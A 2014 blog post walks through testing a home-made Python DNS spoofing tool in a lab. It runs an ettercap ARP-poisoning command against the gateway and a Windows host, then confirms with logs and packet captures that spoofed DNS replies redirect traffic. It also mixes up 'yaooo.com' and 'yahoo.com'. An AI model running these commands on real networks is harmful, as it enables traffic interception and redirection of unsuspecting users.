Sunday, May 25, 2014

Building your own tools - dnsSpoof - Testing

The testing phase
In the previous post we built a DNS Spoofing tool using Scapy and Python.
In this post, we will validate that the script is working as expected

In this lab we will have the following systems
Kali: 192.168.0.15
Windows Hosts: 192.168.0.16
Gateway: 192.168.0.1

Kali
On This system, we will add entries to our hosts file for some common domain.
Let's see what this looks like
root@securitynik:~# cat /etc/hosts
127.0.0.1    yahoo.com
127.0.0.1   microsoft.com


Let's look at the ARP cache of the Windows System
C:\>arp -aInterface: 192.168.0.16 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-04-5a-6c-db-79     dynamic

Let's look at a snapshot of the IPConfig and DNS Settings of the Windows System
Ethernet adapter Local Area Connection:
        IP Address. . . . . . . . . . . . : 192.168.0.16
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.0.1
        DNS Servers . . . . . . . . . . . : 8.8.8.8
                                            4.2.2.1


Let's look at the Windows system host file to ensure these names are not resolved locally
C:\>type "c:\WINDOWS\system32\drivers\etc\hosts"
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost

Now let's go ahead and load dnsSpoof.py on Kali
root@securitynik:~/security-nik# ./dnsSpoof.py eth0 192.168.0.15
Current system is Linux ... Good to go!!
 Sniffing for DNS Packet


Let's load up ettercap to perform our ARP Spoofing for the gateway and the windows hosts
root@securitynik:~# ettercap --mitm arp:remote --text --iface eth0 /192.168.0.1/ /192.168.0.16/

Now that ettercap is running let's check the Windows system ARP Cache again
C:\>arp -a
Interface: 192.168.0.16 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           08-00-27-41-9b-6c     dynamic
  192.168.0.15          08-00-27-41-9b-6c     dynamic

Awesome!! It looks like the Kali system is claiming to be 192.168.0.1

Let's go ahead and ping some hosts from our Windows system.
Remember above when we ran ./dnsSpoof.py we used 192.168.0.15 as the spoofed DNS server (./dnsSpoof.py eth0 192.168.0.15)

C:\>ping yaooo.com -n 1 && ping microsoft.com -n 1

Pinging yaooo.com [192.168.0.15] with 32 bytes of data:
Reply from 192.168.0.15: bytes=32 time<1ms TTL=64

Pinging microsoft.com [192.168.0.15] with 32 bytes of data:
Reply from 192.168.0.15: bytes=32 time<1ms TTL=64

As can be seen above, the Windows system thinks that yahoo.com and microsoft.com are both at 192.168.0.15.

What did dnsSpoof see?
Got Query on Sun May 25 12:51:23 2014
 Received Src IP:192.168.0.16,
 Received Src Port: 53049
 Received Query ID:33693
 Query Data Count:1
 Current DNS Server:8.8.8.8
 DNS Query:yaooo.com.

 Sending spoofed response packet
Sent 1 packets.
 Spoofed DNS Server: 192.168.0.15
 src port:53 dest port:53049
 Sniffing for DNS Packet
 Sniffing for DNS Packet
 Sniffing for DNS Packet

 Got Query on Sun May 25 12:51:23 2014
 Received Src IP:192.168.0.16,
 Received Src Port: 64982
 Received Query ID:36189
 Query Data Count:1
 Current DNS Server:8.8.8.8
 DNS Query:microsoft.com.

 Sending spoofed response packet
Spoofed DNS Server: 192.168.0.15
 src port:53 dest port:64982

DNS Spoof did see the request for yahoo.com and microsoft.com and did send the spoof response.

But how can we further confirm this you ask? Ok let's look at the packet capture from the Window's system perspective
Packets don't lie ... or at least shouldn't :-)

C:\tools>WinDump.exe -nn -r dnsspoof.pcap port 53
reading from file dnsspoof.pcap, link-type EN10MB (Ethernet)
12:51:23.466964 IP 192.168.0.16.53049 > 8.8.8.8.53:  33693+ A? yaooo.com. (27)
12:51:23.480022 IP 192.168.0.15.53 > 192.168.0.16.53049:  33693*- 1/1/1 A 192.168.0.15 (11
2)

12:51:23.497526 IP 192.168.0.16.64982 > 8.8.8.8.53:  36189+ A? microsoft.com. (31)
12:51:23.503152 IP 192.168.0.15.53 > 192.168.0.16.64982:  36189*- 1/1/1 (128)


If we look at the captures and the messages from dnsSpoof we can see the following for yahoo.com
Both dnsSpoof and windump report the time as: 12:51:23
Looking at the source port we see the same: 53049
Looking at the query id, we see: 33693
... and the query name? we see we have yahoo.com

More importantly we see while the client at 192.168.0.16 made a request to 8.8.8.8, it actually got its response from 192.168.0.15

Based on the above, I would conclude the tool works as expected.

Go ahead and analyse the microsoft.com reuqest by yourself ;-)

As seen between these two posts on building and testing your own tools (dnsSpoof.py), it really does not take that much effort if you are willing to put in the time.

No comments:

Post a Comment